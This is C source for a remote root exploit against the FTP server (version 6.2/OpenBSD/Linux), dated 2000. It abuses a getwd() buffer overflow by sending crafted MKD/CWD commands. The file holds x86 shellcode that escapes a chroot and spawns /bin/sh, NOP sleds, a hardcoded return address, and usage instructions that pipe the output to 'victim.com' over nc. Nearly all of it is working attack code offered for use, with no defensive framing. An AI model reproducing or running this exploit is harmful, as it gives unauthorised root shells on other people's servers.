/*
 *  FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ??
 *  getwd() overflow. linux exploit, remote penetration.
 *
 * author: DiGiT - teddi@linux.is
 *
 * greets: p0rtal && \x90 & me for discovering this bug.
 * big thx to duke for ADMwuftp.
 * #hax, #!ADM
 * Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21
 * offset vary from -500 - +500
 * PRIVATE EXPLOIT$#%#%#$
 */

#include <stdio.h>
#include <string.h>
// need to find for other, tested of slack 3.6.
// #define RET 0xbfffec5c
#define RET 0xbfffeb30

#define USERNAME "ftp"
#define PASSWORD "lamer@"

char shellcode[] =

  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
  "\x90\x90\x31\xc0\x31\xdb\xb0\x17"
  "\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
  "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
  "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
  "\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
  "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
  "\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
  "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
  "\x56\x01\xce\x89\x1e\x83\xc6\x03"
  "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
  "\xcd\x80\x31\xc0\x88\x46\x07\x89"
  "\x76\x08\x89\x46\x0c\xb0\x0b\x89"
  "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
  "\x80\xe8\xac\xff\xff\xff";

void mkd(char *dir)
{
  char blah[1024], *p;
  int n;
  bzero(blah, sizeof(blah));

  p = blah;
  for(n=0; n<strlen(dir); n++)
    {
      if(dir[n] == '\xff')
        {
          *p = '\xff';
          p++;
        }
      *p = dir[n];
      p++;
    }

  printf("MKD %s\r\n", blah);
  printf("CWD %s\r\n", blah);
}

void
main (int argc, char *argv[])
{

  char *buf;
  char buf2[200];
  char buf1[600];
  char dir2[256];
  char *p;
  char *q;
  char tmp[256];
  int a;
  int offset;
  int i;

  if (argc > 1) offset = atoi(argv[1]);
  else offset = 0;

  fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
  fprintf(stderr, "shell size = %d\n", sizeof(shellcode));

  dir2[231] = '\0';
  memset(dir2, '\x90', 230);

  printf("user %s\r\n", USERNAME);
  printf("pass %s\r\n", PASSWORD);
  printf("cwd %s\r\n", argv[2]);

  memset(buf1, 0x90, 600);
  p = &buf1[sizeof(argv[2])];
  q = &buf1[599];
  *q = '\x00';
  while(p <= q)
    {
      strncpy(tmp, p, 100);
      mkd(tmp);
      p+=100;
    }

  mkd(dir2);
  mkd(shellcode);
  mkd("bin");
  mkd("sh");

  memset(buf2, 0x90, 100);
  // var 96
  for(i=4; i<96; i+=4)
    *(long *)&buf2[i] = RET + offset;
  p = &buf2[0];
  q = &buf2[99];
  strncpy(tmp, p, 100);
  mkd(tmp);
  printf("pwd\r\n");
}
/*                    www.hack.co.za           [20 May 2000]*/